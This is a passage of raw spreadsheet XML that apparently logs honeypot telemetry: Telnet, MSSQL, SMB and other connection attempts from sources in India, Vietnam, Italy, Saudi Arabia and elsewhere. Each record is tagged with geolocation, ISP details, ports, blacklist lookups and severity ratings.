    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef8:5a76"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2444"/>
    <x v="2444"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T14:03:30"/>
    <d v="2025-03-31T14:46:52"/>
    <d v="2025-04-09T14:03:30"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal (Murli Nagar)"/>
    <s v="1275841"/>
    <s v="462001"/>
    <s v="23.3027"/>
    <s v="77.4044"/>
    <s v="55824"/>
    <s v="National Knowledge Network"/>
    <s v="National Knowledge Network"/>
    <s v="business"/>
    <s v="Bhopal Memorial Hospital &amp; Research Centre (BMHRC)"/>
    <s v="2010-09-14"/>
    <s v="NKN-BHMRC-MP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e8b:32da"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2445"/>
    <x v="2445"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:43:43"/>
    <d v="2025-04-09T13:43:43"/>
    <d v="2025-04-09T13:43:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f568"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2446"/>
    <x v="2446"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:42:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-09T13:42:43"/>
    <n v="76"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;14607&amp;&amp;3306&amp;&amp;445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,59665)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,49951)}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,50422)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cb:a604"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2447"/>
    <x v="2447"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:31:59"/>
    <d v="2025-04-09T13:31:59"/>
    <d v="2025-04-09T13:31:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Vietelgprs"/>
    <s v="consumer"/>
    <s v="GPRS Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:734c:78f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2448"/>
    <x v="2448"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:28:18"/>
    <d v="2023-07-25T08:31:45"/>
    <d v="2025-04-09T13:28:18"/>
    <n v="2218"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H30&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;49085&amp;&amp;80&amp;&amp;1080&amp;&amp;123&amp;&amp;5900&amp;&amp;22&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;631&amp;&amp;61691&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:4110"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2449"/>
    <x v="2449"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:27:10"/>
    <d v="2025-04-09T13:27:10"/>
    <d v="2025-04-09T13:27:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:97a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2450"/>
    <x v="2450"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:16:19"/>
    <d v="2025-04-09T13:16:19"/>
    <d v="2025-04-09T13:16:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6533:fe31"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2451"/>
    <x v="2451"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:13:34"/>
    <d v="2025-04-09T04:49:26"/>
    <d v="2025-04-09T13:13:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Bārdoli"/>
    <s v="1277022"/>
    <s v="NA"/>
    <s v="21.123"/>
    <s v="73.1115"/>
    <s v="132761"/>
    <s v="Smartlink Solutions Pvt. Ltd."/>
    <s v="Smartlink Solutions"/>
    <s v="business"/>
    <s v="Smartlink Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f9:1ad5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2452"/>
    <x v="2452"/>
    <s v="111-246-112-23.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:12:36"/>
    <d v="2025-04-08T03:35:32"/>
    <d v="2025-04-09T13:12:36"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&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2009-07-23"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ff6:7017"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2453"/>
    <x v="2453"/>
    <s v="NA&amp;&amp;host-79-51-44-245.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-09T13:10:29"/>
    <d v="2025-04-03T00:36:00"/>
    <d v="2025-04-09T13:10:29"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="72"/>
    <s v="Campania"/>
    <s v="Naples"/>
    <s v="Nola"/>
    <s v="3172227"/>
    <s v="80035"/>
    <s v="40.9271"/>
    <s v="14.5289"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NAS DHCP Pool Nola"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f33:2cf5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2454"/>
    <x v="2454"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T13:01:26"/>
    <d v="2025-04-09T13:01:26"/>
    <d v="2025-04-09T13:01:26"/>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3:8984"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2455"/>
    <x v="2455"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:53:04"/>
    <d v="2025-04-09T12:53:04"/>
    <d v="2025-04-09T12:53:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Tirupati"/>
    <s v="Pākāla (P.Kothakota)"/>
    <s v="1260830"/>
    <s v="517112"/>
    <s v="13.4174"/>
    <s v="79.1159"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Vemu Institute of Technology"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ef:9539"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2456"/>
    <x v="2456"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:29:45"/>
    <d v="2023-07-25T16:55:32"/>
    <d v="2025-04-09T12:29:45"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1091&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Saifābād)"/>
    <s v="1269843"/>
    <s v="500001"/>
    <s v="17.4063"/>
    <s v="78.4675"/>
    <s v="150008"/>
    <s v="Pioneer Elabs Ltd."/>
    <s v="Pioneer Elabs Ltd."/>
    <s v="business"/>
    <s v="Pioneer Elabs Ltd."/>
    <s v="2013-04-15"/>
    <s v="PEL-IN"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.24.126.45,52227)}&amp;&amp;{Data_SMB:Incoming connection (103.24.126.45,53614)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6718:7e2d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2457"/>
    <x v="2457"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:22:30"/>
    <d v="2025-04-09T12:22:30"/>
    <d v="2025-04-09T12:22:30"/>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3b5d:a26d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2458"/>
    <x v="2458"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:19:40"/>
    <d v="2025-04-09T12:19:40"/>
    <d v="2025-04-09T12:19:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Shahid Bhagat Singh Nagar"/>
    <s v="Banga"/>
    <s v="1277338"/>
    <s v="NA"/>
    <s v="31.1887"/>
    <s v="75.9949"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:c042"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2459"/>
    <x v="2459"/>
    <s v="125-228-157-180.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:11:30"/>
    <d v="2025-01-20T04:23:23"/>
    <d v="2025-04-09T12:11:30"/>
    <n v="152"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:9db4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2460"/>
    <x v="2460"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T12:11:15"/>
    <d v="2025-04-09T12:08:51"/>
    <d v="2025-04-09T12:11:15"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="02"/>
    <s v="Mecca Region"/>
    <s v="NA"/>
    <s v="Jeddah"/>
    <s v="105343"/>
    <s v="NA"/>
    <s v="21.4901"/>
    <s v="39.1862"/>
    <s v="25019"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="business"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5d70:e15a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2461"/>
    <x v="2461"/>
    <s v="NA&amp;&amp;114-42-158-121.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-09T12:10:10"/>
    <d v="2025-04-05T08:42:40"/>
    <d v="2025-04-09T12:10:10"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
